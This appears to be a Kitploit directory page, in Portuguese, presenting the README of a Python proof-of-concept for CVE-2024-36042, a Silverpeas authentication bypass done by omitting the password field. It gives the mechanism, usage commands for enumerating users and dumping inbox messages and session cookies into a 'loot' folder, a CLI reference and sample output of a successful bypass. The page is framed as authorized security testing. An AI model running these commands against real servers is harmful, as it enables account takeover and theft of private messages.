Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Silverpeas-AuthBypass-CVE-2024-36042 — Python PoC para CVE-2024-36042, bypass de autenticação em Silverpeas < 6.3.5. Inclui detecção de versão, enumeração de usuários multithread, extração de mensagens e relatórios estruturados para testes de segurança autorizados. | Kitploit
Ferramentas/GitHubGitHub/ha5ant/silverpeas-authbypass-cve-2024-36042
Autenticação e AutorizaçãoReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoRed Teaming

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub
ha5ant/silverpeas-authbypass-cve-2024-36042

Silverpeas-AuthBypass-CVE-2024-36042

Python PoC para CVE-2024-36042, bypass de autenticação em Silverpeas < 6.3.5. Inclui detecção de versão, enumeração de usuários multithread, extração de mensagens e relatórios estruturados para testes de segurança autorizados.

Ver Repositório
5há 3 mesesAinda não revisado

Silverpeas-AuthBypass-CVE-2024-36042

Uma prova de conceito Python3 limpa e de nível profissional para CVE-2024-36042 — uma bypass de autenticação no Silverpeas < 6.3.5 causada pela falta de validação de senha em AuthenticationServlet.

Python 3.8+ License: MIT


Visão Geral

O AuthenticationServlet do Silverpeas aceita uma solicitação de login mesmo quando o parâmetro Password é omitido do corpo do POST, concedendo acesso de sessão autenticada a qualquer nome de usuário conhecido. Esta ferramenta demonstra a vulnerabilidade de forma responsável por meio de um framework de exploit modular e com threads, com reconhecimento avançado, extração de dados e geração de relatórios profissionais.

Afetado: Silverpeas < 6.3.5
CVE: CVE-2024-36042
GHSA: GHSA-qvh3-8c57-gp4m


Recursos


Instalação

root@kitploit:~
git clone https://github.com/YOURNAME/Silverpeas-AuthBypass-CVE-2024-36042.git
cd Silverpeas-AuthBypass-CVE-2024-36042
pip install requests beautifulsoup4

Uso

Teste rápido (lista de usuários integrada)

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 --dump-messages

Relatórios Avançados (Markdown + Console)

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 -u admin --dump-messages --message-output both

Exportação Forense (Arquivos individuais por mensagem)

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 --userlist users.txt --dump-messages --message-output files --output-format md --outdir ./loot

Verificação de versão apenas (sem exploração)

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 --check-version --no-exploit

Através de um proxy com registro de HTML bruto

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 --proxy http://127.0.0.1:8080 --dump-messages --save-raw-html

Gerenciamento de Saída

A ferramenta suporta quatro modos principais de saída para mensagens extraídas via --message-output:

  1. console (Padrão): Exibe mensagens limpas diretamente no terminal com realce de palavras-chave.
  2. markdown: Gera um relatório único {username}_messages.md por conta no diretório de saída.
  3. files: Cria uma pasta por conta e salva cada mensagem como um arquivo individual (ex.: message_0006.md) com IDs preenchidos com zeros para uma ordenação limpa no filesystem.
  4. both: Combina os modos console e markdown.

Estrutura de Artefatos

root@kitploit:~
outdir/
├── SilverAdmin/
│   ├── message_0001.md
│   ├── message_0002.md
│   ├── raw/ (optional: --save-raw-html)
│   │   └── msg_1.html
│   └── session_cookies.txt
├── scr1ptkiddy/
│   ├── messages.md
│   └── session_cookies.txt
└── summary.json

Referência da CLI

root@kitploit:~
-t, --target        Base URL of Silverpeas (required)
-u, --user          Single username to target
--userlist          File with one username per line
--dump-messages     Scrape and display inbox messages
--max-id            Max message ID to check (default: 50)
--threads           Concurrent workers (default: 5)
--proxy             HTTP proxy URL
--message-output    Output mode: {console, markdown, files, both}
--output-format     File format: {md, txt}
--json              Export full JSON report
--csv               Export CSV of scraped messages
--outdir            Output directory for exports
--no-color          Disable ANSI color output (useful for logs)
--save-raw-html     Save original HTML responses for debugging
--check-version     Fingerprint version only
--no-exploit        Skip exploitation (pair with --check-version)
--quiet, -q         Minimal output
--no-banner         Suppress banner

Exemplo de Saída

root@kitploit:~
[*] Target   : http://10.49.169.44:8080
[*] Version  : 6.3.1
[+] Version 6.3.1 < 6.3.5 - vulnerable.

[*] Trying: scr1ptkiddy
[+] BYPASSED -> scr1ptkiddy
[+] Data saved to ./scr1ptkiddy

────────────────────────────────────────────────────────────────────
  Execution Summary
────────────────────────────────────────────────────────────────────
┌───────────────┬──────────┬──────────┐
│ Account       │ Status   │ Messages │
├───────────────┼──────────┼──────────┤
│ scr1ptkiddy   │ SUCCESS  │ 6        │
│ admin         │ FAILED   │ 0        │
└───────────────┴──────────┴──────────┘

[+] JSON report -> ./report_20260516_013210.json

Por Que Isso Existe

Este repositório faz parte do meu portfólio de segurança ofensiva. Ele demonstra:

  • Tradução de Pesquisa de Vulnerabilidades — convertendo uma CVE divulgada em um exploit funcional e confiável.
  • Ferramentas de Alta Qualidade — tratamento robusto de erros, suporte multilíngue e gerenciamento estruturado de saída.
  • Consciência Operacional — multithreading, suporte a proxy e lógica de deduplicação para ambientes realistas.
  • Engenharia Profissional — arquitetura de código limpa, documentação abrangente e foco na experiência do operador (UX).

Aviso Legal

Esta ferramenta é fornecida apenas para testes de segurança autorizados, pesquisa e fins educacionais. O acesso não autorizado a sistemas de computador é ilegal. Sempre obtenha permissão explícita antes de testar qualquer infraestrutura que você não possua.


Licença

MIT

Baixar ferramenta
RecursoDescrição
Detecção de VersãoIdentifica a versão do Silverpeas e o status da vulnerabilidade antes da exploração.
MultithreadEnumeração concorrente de usuários via ThreadPoolExecutor com saída thread-safe.
Descoberta AvançadaDescoberta de endpoints multilíngue (inglês/francês) com sondagem de múltiplos IDs.
Extração de DadosExtração de mensagens de alta fidelidade com deduplicação e filtragem de conteúdo repetitivo.
Saída FlexívelSuporte a Console, relatórios Markdown e exportação de arquivos individuais (.md ou .txt).
Proxy e DepuraçãoRoteie através do Burp/ZAP (--proxy) e salve HTML bruto para depuração do parser.
UX LimpaTabelas de resumo ASCII, realce de palavras-chave e controle opcional de cores ANSI.